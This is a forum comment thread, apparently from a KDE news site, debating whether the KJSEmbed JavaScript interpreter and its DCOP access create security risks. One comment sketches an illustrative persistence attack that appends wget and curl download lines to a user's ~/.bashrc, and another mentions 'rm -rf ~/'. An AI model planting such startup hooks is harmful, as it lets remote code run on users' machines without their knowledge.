Just saw this too: http://www.kdedevelopers.org/node/view/427
Any chance for unstable kjsembed releases or even snapshots from cvs (that rely on kdelibs 3.2.x not kdelibs-cvs)?
this will work with kde 3.2. its a matter of getting a source snapshot of KDE bindings from head. We are currently debating an release in a few weeks to help people who wish to start using KJSEmbed now. In fact I really want a release so I can add this to www.kde-apps.org.
It needs latest CVS because I fixed a bug where QBoxLayouts didn't work. Stay tuned. Worst case Rich or I can make this available on our websites.
While I'm pretty confident about KDE developers, I wonder how close this mimics WSH and Windoze scripting, and if this could raise security concerns...
For example, I believe JS embedded in e-mails should be able to do stuff into the mail itself, but never be able to access mail client functionality (Addressbook access, harvest address from another mails, sending mails, etc.), and of course shouldn't be able to access functionality from another parts of the system.
No, JS in emails should not be allowed (and I'm sure it won't be by the KMail developers). Sandboxing sounds nice in theory, but it's impossible to get perfect in practice. It's a humongous security hole waiting to happen and there's no good reason for it. Mouseovers in your HTML mail are not a good reason. If you want to send something that includes code, send it as an attachment and make people execute it manually. JS in webpages is bad enough, but at least you have to go and visit a site to execute the code, so you have some say in what does and doesn't get executed. If JS in emails got executed automatically, anybody could make people execute arbitrary JS code just by sending it to them in an email and waiting for them to view it. Any security hole in JS immediately becomes remotely exploitable on an arbitrary target system, with no user action required other than checking email.
to install spyware on your KDE box ?
For instance, having your spyware run everytime you run KDE...
It's nice to see features but I see some problem
here if not done security wise.
What about root users running KDE viewing some website or email
and then getting infected without notice ?!
Infected like installing a SPAM server, installing rootkits, etc.
What about not working as root at all?
Come on, u dont need to be root to have installed spyware, what about rewriting bashrc, or something like that ??
Get the idea?
How will rewriting a bashrc of a user allow to install a rootkit?
echo -e "
hex version of #!/bin/bash
if -e ~/run then
wget ... >>/dev/null
curl ... >>/dev/null
chmod 755 ~/run
" >> ~/.bashrc
Rootkit are to be run as non-root to gain root,
install crapt in some case, open ports, remove all trace,
make your box a slave...
Everyone claim down. The KHTML developers haven't lost their minds (anymore than usual =) )
My goal wass not to spread FUD or fear,
I just want to make sure that people are security concious period.
I admit, I haven't read the entire KDE CVS to look how it's implemented,
just read the article and few about it.
Perl or Python are executed from webpage on the server not locally (no risk),
Maybe with a KIO-Fuse or io-cmd slave...
Now, how you get KIO-Fuse from Konqueror, you probably can't...
However, someone else wasn't that cautious:
click me (not really!)
which is traditionally used by Konqueror."
Okay, now if it uses the same "interpreter"
how does that same "interpreter" is isolated from DCOP ?
Someone pointed into the "sandbox" feature, how does it work?
Is there any regular "testing" done upon every release to ensure
no security risk are presents?
Mainly DCOP calls don't work in Konqueror/KHTML/KMail?
The best way is "education", show, describe, write webpages
describing why it's "impossible".
Bugs appears often when people discover them
and wouldn't be please no more than anyone else 2 years from now
when a bug would allow such... and people exploiting it!
For what its worth, I love KDE, I think it's a great environment,
but I think it's worth being a bit more cautious about what's get in.
In the case of KJSembed, JS is used as a regular local scripting language. All scripts have to be on disk, and are executed like any other script or programm. KJSembed is a separate interpreter, having absolutely no connection to KHTML or Kmail. It is used just like Bash, Python or Perl by setting a script's first line to "#!/usr/bin/kjsembed".
Of cource, you can write a malicious script using KJSembed, just like you could write a Bash script doing "rm -rf ~/" or a C Programm doing the same.
Thanks for the clarification.
I know the about your urge to promote fear of any platform that KDE supports, but please refrain from outright lies.
1) KJSEmbed scripts must be run of the local file system. Since you obviously have no clue how KDE operates Ill let you know that KMail attachments, Webpages etc. are not a local file system.
2) KRun (the thing that starts stuff up) cannot run scripts on click*. This is a bug, it will be able to run scripts in 3.3 that are marked executable by the file system. So again you lose, a script must be downloaded, and chmod +x to even run.
3) KDE doesn't introduce any new holes that UNIX has not had for the last 30 years in respects to shell scripts. We are just allowing GUI applications to be automated the way CLI apps have been for years.
So please in the future put your FUD somewhere more useful than KDE. We have no time for ignorant chicken little's who love to yell the sky is falling as loud as we can.
*This is not totally true but its not worth explaining the details of that here, refer to the kde-core-devel list.
It's only similarity is that it is a script engine.... please research this stuff before posting or go back to slushdot.
This adds absolutely no more risk than say python, perl or even bash shell do to linux. How many python viruses do we have out there? Oh in the last 30 years how many shell viruses have we seen? Hmmm maybe 0 at last count? You might think if there where a way to spread a script virus on unix they would have found it in the last 30 years, right?
All in all while your FUD is amusing to me personally, it's not helping the spread of our platform. If you wish to give input please, I beg you to at least research and learn the architecture before spreading fear and doubt about the platform. I have been fighting these lame arguments with dcop for years, I would think people here like KDE enough to not spread FUD like this.
It's easy to understand why people might be concerned having only read the news item. Take this extract:
Alarm bells may be ringing at this point for some people as they imagine Web pages in Konqueror offering the sort of "integration" Microsoft are well known for.
"This article covers how to use the DCOP API from KJSEmbed and sports a simple demo script that shows off how to use this API."
Now I know that people have to read your article to understand what's really going on here, and I haven't even read your article yet, but then I do know what KJSEmbed is about. The news item could be the first many people have heard/read about your work - I'd argue that a better first impression could dampen down some of that unnecessary criticism.
And by that logic is perfectly for me to walk into a crowded theater and without looking for any fire alarms i should yell as loud as possible "we could all die in a fire here because there are no fire alarms!"
please, don't promote your own knee jerk reactions. you not only look foolish, but you scare people who may have less of a clue about what is going on than you. This is truly a disservice to Open Source because you undermine the platform by spreading FUD that can propogate for years.
I don't follow your "logic" at all. Remember that news items like this one get syndicated widely, either via RDF/RSS or by page "mining". All it takes is for someone to see a badly presented/summarised piece of technology in a news feed and they're going to react exactly as people have in the earlier comments.
All I was doing was explaining the phenomenon, but if you want to throw your hands up in disbelief every time it happens, feel free to do so!
BTW, a more apt analogy is you meeting a group of strangers, introducing yourself with the phrase "I eat turtles" (when you do not and never have considered doing so) and then being surprised that you're subsequently known as "the turtle eater".
well it revolves around the central issue that you refuse to understand what you are talking about... thats all.
this isn't slashdot, we can read the articles before we respond.
>this isn't slashdot, we can read the articles before we respond.
This one made my day ;)
"Alarm bells may be ringing at this point for some people as they imagine Web pages in Konqueror offering the sort of "integration" Microsoft are well known for."
I can understand well reasoned but ill-informed comments. This is just bollocks. Try and understand how Microsoft implements scripting first. It doesn't have to be that way, and it won't.
> How many python viruses do we have out there?
At least one ;)
At least 9 Perl virus, 4 PHP virus and 1 Python virus
without looking extensively... on Google!
Few more links on Shell Virus from Google:
you forgot the most common unix virus though.
i have to admit in the last 21 years on a computer ive seen more Amiga viruses than Unix ones =) The point i was attempting to make is how many viruses have you _seen_. Id be hard pressed past trojans installed as parts of root kits that no-one has seen these in the wild.
amusing none the less.
Scripting like this is no more of a risk, and will add great functionality. Please don't confuse this with Windoze scripting. Microsoft in their infinite wisdom decided to expose the whole of Windows to the outisde world through scripting and ActiveX. That should not give scripting itself a bad name.
IMHO the largest problem with windows scripting is their lack of concept of the execute bit. Because of this they treat every file that is a script as an executable. So click on a web link with a exe it runs... click on an exe in an email, again it runs.... scary man.
KDE has a sane group of developers and Unix architecture makes it easier for us to do things right. We can make the scripts easy for users to use, but harder to shoot themselves in the feet with.
The only thing we have to fear from scripting integration in KDE is increased usabilaty and more functionality that will make things like KDE prime time!
Tcl has a version that can be loaded into a browser so you can
embed tcl in your code for client-side execution. The Tcl guys thought
about this and made it so that the Tcl code does not allow any file system
access. In fact, there is a list of things that are turned off. The user must
turn on the things that will be tolerated. But the default is that the worst
the code could do is destroy it's own window.
I would suggest looking at the Tcl 'safe interpreter' layout for useful pointers in this respect.
Yes, but Safe Tcl has been around for *ages*, whereas a lot of people only wised up to sandboxed execution well after Java came out.
On another subject related to undone homework, I'd like to refer you to RFC 1521 (http://www.ietf.org/rfc/rfc1521.txt) where a search for "security considerations" will provide some interesting insights. Section 7.4.2 is especially interesting in the light of recent vulnerabilities in various PostScript viewers (http://dot.kde.org/1049927346/).
Of course, the most interesting thing about RFC 1521 is the date. I guess that all those "sufficient research and implementations" were all in vain.
I would suggest maybe going out on a limb and researching before you speak, but hey I'm pragmatic, what can I say.
a) This is not in a browser.
b) We have the ability to "create a list of things to turn off"
This isn't rocket science people.